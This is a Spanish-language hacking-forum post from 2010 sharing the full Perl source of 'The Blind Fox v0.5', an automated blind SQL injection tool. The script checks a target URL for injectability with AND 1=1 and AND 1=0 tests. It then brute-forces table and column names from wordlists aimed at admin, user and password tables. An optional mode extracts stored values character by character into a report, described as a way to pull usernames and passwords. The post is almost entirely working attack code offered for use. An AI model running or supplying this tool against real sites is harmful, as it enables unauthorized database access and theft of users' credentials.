The Blind Fox V0.5

Iniciado por DeuSer, Marzo 25, 2010, 07:45:08 PM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.

Marzo 25, 2010, 07:45:08 PM Ultima modificación: Agosto 16, 2014, 10:30:29 AM por Expermicid
El amigo Login-Root creo una nueva herramienta desarrollada en perl para SQL pero en este caso para Blind SQL, la cual sirve para:

1- Chekeo AND 1=1 y AND 1=0 (verificacion de vuln.)
2- Information_Schema && MySQL.User
3- Tablas
4- Columnas
5- Extrae valores de las tablas (Opcional)

Código: perl
#!/usr/bin/perl

####################################################################
#                           -[+]- The Blind Fox v0.5 | By Login-Root -[+]-              ###
####################################################################

####################################################################
# [+] inf0:                                                                             ###
####################################################################
# Busca:                                                                                ###
# ======                                                                                ###
#  - Checkeo AND 1=1 && AND 1=0                                                         ###       
#  - Information_Schema && MySQL.User                                                   ###
#  - Tablas                                                                             ###                                               
#  - Columnas                                                                           ###
#  - Extrae valores de las tablas (Opcional)                                            ###
#                                                                                       ###
#  ...y guarda todo en un archivo de texto.                                             ###
#                                                                                       ###
###########################################################################################

###########################################################################################
# [+] Use:                                                                              ###
###########################################################################################
# perl blindfox.pl [WEBSITE] [PATRON] [FILE] [-EXT]                                     ###
#   [WEBSITE]: http://www.web.com/index.php?id=4875 (Poner un numero valido)            ###
#   [PATRON]:  Patron que exista con AND 1=1 y que no exista con AND 1=0                ###
#   [FILE]:    Archivo donde guardar informe                                            ###
#   [-EXT]:    Para extraer nombres de usuarios, passwords, etc (Opcional)              ###
###########################################################################################

###########################################################################################
# [+] c0ntact:                                                                          ###
###########################################################################################
# MSN:    [email protected]                                                          ###
# Jabber: [email protected]                                                             ###
# E-Mail: [email protected]                                                       ###
###########################################################################################

###########################################################################################
# [+] sh0utz:                                                                           ###
###########################################################################################
# In memory of ka0x | Greetz: KSHA ; Psiconet ; Knet ; VenoM ; InyeXion                 ###
# Many thanks to boER, who teach me a little of perl ;D                                 ###
# VISIT: WWW.MITM.CL | WWW.REMOTEEXECUTION.ORG | WWW.DIOSDELARED.COM                    ###
###########################################################################################

use LWP::Simple;

if(!$ARGV[2])
    {
         print "
-[+]- The Blind Fox v0.5 | By Login-Root -[+]-
==============================================";
         print "
Uso: perl $0 [WEBSITE] [PATRON] [FILE] [-EXT]
";
         print "
[WEBSITE]: http://www.web.com/index.php?id=4875 (Poner un numero valido)
[PATRON]:  Patron que exista con AND 1=1 y que no exista con AND 1=0
[FILE]:    Archivo donde guardar informe
[-EXT]:    Para extraer nombres de usuarios, passwords, etc (Opcional)
";
         exit (0);
    }
   
sub end()
{
    print WEB "

[*EOF*]";
    print "
[+] Todo salvado correctamente en $ARGV[2]
";
    print "## c0ded by Login-Root | 2008 ##
";
    exit (0);
}   

   
@nombretabla=('admin','tblUsers','tblAdmin','user','users','username','usernames','usuario',
      'name','names','nombre','nombres','member','members','admin_table',
      'miembro','miembros','membername','admins','administrator','sign',
      'administrators','passwd','password','passwords','pass','Pass',
      'tAdmin','tadmin','user_password','usuarios','user_passwords','user_name','user_names',
      'member_password','mods','mod','moderators','moderator','user_email',
      'user_emails','user_mail','user_mails','mail','emails','email','address',
      'e-mail','emailaddress','correo','correos','phpbb_users','log','logins',
      'login','registers','register','usr','usrs','ps','pw','un','u_name','u_pass',
      'tpassword','tPassword','u_password','nick','nicks','manager','managers','administrador',
      'tUser','tUsers','administradores','clave','login_id','pwd','pas','sistema_id',
      'sistema_usuario','sistema_password','contrasena','auth','key','senha','signin',
      'tb_admin','tb_administrator','tb_login','tb_logon','tb_members_tb_member','club_authors',
      'tb_users','tb_user','tb_sys','sys','fazerlogon','logon','fazer','authorization',
      'membros','utilizadores','staff','nuke_authors','accounts','account','accnts','signup',
      'associated','accnt','customers','customer','membres','administrateur','utilisateur',
      'tuser','tusers','utilisateurs','password','amministratore','god','God','authors','wp_users',
      'asociado','asociados','autores','membername','autor','autores','Users','Admin','Members',
      'Miembros','Usuario','Usuarios','ADMIN','USERS','USER','MEMBER','MEMBERS','USUARIO','USUARIOS','MIEMBROS','MIEMBRO');

@nombrecolumna=('admin_name','cla_adm','usu_adm','fazer','logon','fazerlogon','authorization','membros','utilizadores','sysadmin','email',
          'user_name','username','name','user','user_name','user_username','uname','user_uname','usern','user_usern','un','user_un','mail',
          'usrnm','user_usrnm','usr','usernm','user_usernm','nm','user_nm','login','u_name','nombre','login_id','usr','sistema_id','author','user_login',
          'sistema_usuario','auth','key','membername','nme','unme','psw','password','user_password','autores','pass_hash','hash','pass','correo',
          'userpass','user_pass','upw','pword','user_pword','passwd','user_passwd','passw','user_passw','pwrd','user_pwrd','pwd','authors',
          'user_pwd','u_pass','clave','usuario','contrasena','pas','sistema_password','autor','upassword','web_password','web_username');

if ( $ARGV[0]   !~   /^http:/ )
  {
      $ARGV[0] = "http://" . $ARGV[0];
  }

open(WEB,">>".$ARGV[2]) || die "
[-] Imposible crear el archivo de texto
";
print WEB "[WEBSITE]:
$ARGV[0]
";
print "
[!] Chequeando por el patron...
";
      $sql=$ARGV[0]." AND 1=1";
      $response=get($sql);
      if($response =~ /$ARGV[1]/)
        {
            print "
[+] Patron encontrado con AND 1=1
";
            print WEB "$sql => OK !
";
            $sql=$ARGV[0]." AND 1=0";
            $response=get($sql);
            if($response =~ /$ARGV[1]/)
            {
                print "[-] Patron encontrado tambien con AND 1=0, posiblemente no vulnerable a Blind SQL Inyection, probar con otro patron
";
                exit (0);
            }
            else
            {
                print "[+] Patron no encontrado con AND 1=0, website vulnerable a Blind SQL Inyection
";
                print WEB "$sql => OK !
";
            }
         }
         else
                 {
                     print "[-] Patron no encontrado, probar con otro
";
                     exit (0);
                 }
        print "
[!] Chequeando si existe Information_Schema...";
        $sql=$ARGV[0]." AND (SELECT Count(*) FROM information_schema.tables)";
        $response=get($sql);
         if($response =~ /$ARGV[1]/)
             {
                 print "
[+] Information_Schema disponible...guardando en $ARGV[2]";
                print WEB "
[INFORMATION_SCHEMA]:
$sql
";
               
             }
         else
             {
                print "
[-] Information_Schema no disponible";
             }
        print "
[!] Chequeando si existe MySQL.User...";
        $sql=$ARGV[0]." AND (SELECT Count(*) FROM mysql.user)";
        $response=get($sql);
         if($response =~ /$ARGV[1]/)
             {
                 print "
[+] MySQL.User disponible...guardando en $ARGV[2]";
                print WEB "
[MYSQL.USER]:
$sql
";
               
             }
         else
             {
                print "
[-] MySQL.User no disponible";
             }
        print "
[!] Bruteando tablas...";
        print WEB "
[TABLAS]:
";
        foreach $tabla(@nombretabla)
         {
                  chomp($tabla);
                  $sql=$ARGV[0]." AND (SELECT Count(*) FROM ".$tabla.")";
                  $response=get($sql);
                  if($response =~ /$ARGV[1]/)
                    {
                        print "
[+] La tabla $tabla esta disponible...guardando en $ARGV[2]";
                        print WEB "$sql
";
                    }
                }
        print "
[!] Tabla a la cual brutear columnas: ";
            $tabla.=<STDIN>;
            chomp($tabla);
            print WEB "
[COLUMNAS EN $tabla]:
";
            foreach $columna(@nombrecolumna)
            {
             chomp($columna);
             $sql=$ARGV[0]." AND (SELECT Count(".$columna.") FROM ".$tabla.")";
             $response=get($sql);
             if ($response =~ /$ARGV[1]/)
                  {
                      print "[+] La columna $columna esta disponible...guardando en $ARGV[2]
";
                      print WEB "$sql
";
                  }
            }
         if ($ARGV[3] =~ /-EXT/)
         {
             extrac:
             $columna = '';
             print "
[!] Columna de la tabla $tabla a la cual extraer campos: ";
             $columna.=<STDIN>;
            chomp($columna);
             print "[!] Extrayendo valores de la tabla $tabla y columna $columna (puede demorar mucho tiempo)...
";
             print WEB "
[Valores de la tabla $tabla y columna $columna]:
";
             $search = 1;
             $posicion = 1;
             $limit = 0;
             $comprob = 1;
             while ($search <= 255)
             {
                 $sql=$ARGV[0]." AND ascii(substring((SELECT " .$columna. " FROM " .$tabla." limit " .$limit.",1),".$posicion.",1)) = " .$search;
                 $response=get($sql);
                 if ($response =~ /$ARGV[1]/)
                  {
                        $char = chr($search);
                        print WEB "$char";
                        print "$char";
                      $search = 0;
                      $posicion++;
                      $comprob++;
                  }
                 if ($search == 255)
                 {
                     print "
";
                     print WEB "
";
                     if ($comprob == 1)
                     {
                         $eleccion = '';
                         print "[+] Busqueda finalizada. Desea extraer valores de otra columna? [Y/N]: ";
                         $eleccion.=<STDIN>;
                         chomp($eleccion);
                         if ($eleccion =~ /Y/)
                         {
                             goto extrac;
                         }
                         else
                         {
                            end();
                         }
                     }
                     $comprob = 1;
                     $search = 0;
                    $limit++;
                 }
                 $search++;
            }
           }
end();